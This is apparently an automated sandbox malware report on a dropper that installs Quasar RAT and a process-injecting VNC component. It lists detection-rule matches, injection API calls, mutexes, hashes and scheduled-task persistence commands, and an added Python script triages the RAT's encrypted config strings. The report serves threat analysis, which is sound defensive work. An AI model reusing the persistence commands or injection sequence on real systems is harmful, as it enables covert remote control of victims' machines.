                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPED, Matched rule: Vermin_Keylogger_Jan18_1, date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPED, Matched rule: xRAT_1, date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPED, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7B11C GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,GetLastError,CloseHandle,GetKeyState,ExitWindowsEx,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 004034E4 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory,
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB126D NtQueryVirtualMemory,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy,
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree,
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\btpanui
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Users\user\Desktop\desktop.ini
Source: winsock.exe.6.dr, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E1A06A GetLastError,FormatMessageW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
Source: CVbJSUXraQ.exe Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,
Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
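A first-pass triage of the five Base64 strings above, added here by the editor; it is not code from the report, from Joe Sandbox or from the RAT itself. Decoding them gives 64, 96, 64, 64 and 64 bytes, all AES-block aligned and random-looking, which is what Quasar's settings look like in its public source (Base64 of HMAC-SHA256 || IV || AES-CBC ciphertext, with the key derived from a password compiled into the client). Whether this sample uses exactly that layout is an assumption; the report does not show the password, so the block classifies rather than decrypts. The classification thresholds are the editor's own heuristics.

```python
"""Triage of the Base64 strings the report extracted from windef.exe / winsock.exe.

Added example (not from the report). REPORT_STRINGS are the five strings the
report lists; the labelling rules in classify_bytes() are editor assumptions.
"""
import base64
import math
from collections import Counter

REPORT_STRINGS = [
    "oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==",
    "QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev",
    "iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==",
    "lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==",
    "plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A==",
]


def shannon_entropy(buf):
    """Bits per byte (max 8; for short buffers the ceiling is log2(len))."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def classify_bytes(raw):
    """Label a decoded blob 'text', 'likely-ciphertext' or 'binary' and return the facts used."""
    printable = sum(32 <= b < 127 for b in raw) / len(raw)
    entropy = shannon_entropy(raw)
    facts = {
        "length": len(raw),
        "block_aligned": len(raw) % 16 == 0,      # AES block size
        "entropy": round(entropy, 2),
        "printable_ratio": round(printable, 2),
    }
    if printable > 0.95:
        label = "text"                 # Base64 used only as an obfuscation layer: just decode it
    elif facts["block_aligned"] and entropy > 4.0:
        label = "likely-ciphertext"    # needs a key, not a decoder
    else:
        label = "binary"
    return label, facts


def classify(b64):
    return classify_bytes(base64.b64decode(b64))


def triage(strings):
    return [classify(s) for s in strings]


if __name__ == "__main__":
    for label, facts in triage(REPORT_STRINGS):
        print(label, facts)
```

For the 64-byte strings the HMAC-plus-IV assumption leaves a single 16-byte ciphertext block, i.e. a short field such as a hostname or tag; the 96-byte string leaves 48 bytes, enough for a host:port list. Recovering the plaintext means locating the password string in the .NET assembly and re-implementing the PBKDF2 derivation, which is out of scope for a report page.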
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0
Source: C:\Users\user\AppData\Local\Temp\windef.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: CVbJSUXraQ.exe Static file information: File size 2111264 > 1048576
Source: CVbJSUXraQ.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DD8945 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB103B push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ABE0BC push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADEAA9 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADEA73 push cs; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADE3DD push es; iretd
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CA2D0C push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\windef.exe Code function: 6_2_00F125B2 push esi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD8945 push ecx; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC4257 push edi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC426B push edi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041A068 push 0041A08Eh; ret
